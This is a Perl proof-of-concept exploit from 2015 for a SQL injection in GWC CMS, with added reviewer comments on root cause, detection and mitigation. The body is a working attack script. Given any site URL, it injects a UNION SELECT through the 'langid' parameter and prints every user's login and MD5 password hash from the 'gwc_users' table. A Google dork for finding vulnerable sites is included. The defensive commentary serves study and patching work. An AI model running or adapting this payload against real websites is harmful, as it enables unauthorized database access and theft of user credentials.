# Exploit Title: GWC CMS SQL Injection Vulnerability
# Exploit Author: nopesled
# Google Dork: "inurl:?langid=1 inurl:topmenuid="
# Date: 08/07/2015
# Version: 1.0
# Tested on: Linux

#!/usr/bin/perl

# Reviewer notes (defensive reading of this proof of concept):
#
# * Root cause, as far as this script shows: the value of the `langid`
#   query parameter reaches a SQL statement without being bound or
#   validated, so a UNION SELECT appended to it is executed by the
#   database. The server-side code is not on this page, so the exact
#   query is not known here.
# * Impact demonstrated: the `userlogin` and `userpasswd` columns of the
#   `gwc_users` table are returned inside the rendered page.
# * The response is matched against 32 hexadecimal characters, which is
#   the length of an MD5 digest; presumably the application stores
#   unsalted MD5 password hashes (to be confirmed against the schema).
# * Detection: web-server or WAF logs in which `langid` carries anything
#   other than an integer, in particular the keywords UNION, SELECT,
#   group_concat or the table name gwc_users.
# * Mitigation: bind `langid` as an integer in a parameterized query (or
#   reject non-numeric values before the query is built), give the
#   application's database account no more privileges than it needs,
#   and migrate stored passwords to a salted, slow password hash.

use LWP::UserAgent;
use HTTP::Request::Common qw(GET);

print " == Exploit by nopesled == \n";

# A base URL is the only argument; stop with usage text when it is missing.
die "Invalid amount of arguments\nExample: perl $0 http://site.com\n"
    unless @ARGV >= 1;

my $site = shift;
my $ua   = LWP::UserAgent->new;

# The injected value: a negative id so the original query matches no row,
# followed by a 15-column UNION whose last column concatenates login and
# password for every row of gwc_users.
my $payload = "$site/?langid=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(0x3c62723e,userlogin,0x3a,userpasswd) from gwc_users--";

print "[+] Grabbing Admin login [+]\n";

my $response = $ua->request(GET($payload));

# Any non-2xx answer ends the run.
die "[+] Request failed [+]" unless $response->is_success;

# Success is judged by a run of 32 lowercase hex characters in the body.
if ($response->content =~ /(.+[0-9a-f]{32})/) {
    print "[+] Admin info obtained [+]\n\n$1\n";
    exit;
}

die "[+] Admin info not found [+]";

=pod

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Signed.
-----BEGIN PGP SIGNATURE-----
Version: Keybase OpenPGP v2.0.20
Comment: https://keybase.io/crypto

wsBcBAABCgAGBQJVnUB5AAoJEOB0UMODnV4UWD0IAIPzPvMFsJOGhlv1HF1Nb1Xg
g9fWZ8FWBV0/+hUuEBQX0TmcEgugssdG+ce4qhYthnqgKa9PgM/oViDUn4eEK32c
/yyOgQ+uY4wMIZaV4LykLx3i9Dwh1kF+MuphLwHhPmuZMBu2sQNELJjdTtWJ6+cW
Ue9g1eF1Af+Hn2LY+LBSwb9XbLYSqFkUAYSon/NCQgC7YWA+t7+B434zkgXBwZDe
/ppTysv6nSI0EVap0u4dh7qafztQsFK2DF2f/cnU6JtYpOPvgbuoa/kHQ9yAVAr6
6LbNVN3uKXUd63ZlJvRAHao7mvrVzIojzstRiX8oOHl0u99NMHJukUEX7UhWXAM=
=TMgD
-----END PGP SIGNATURE-----

=cut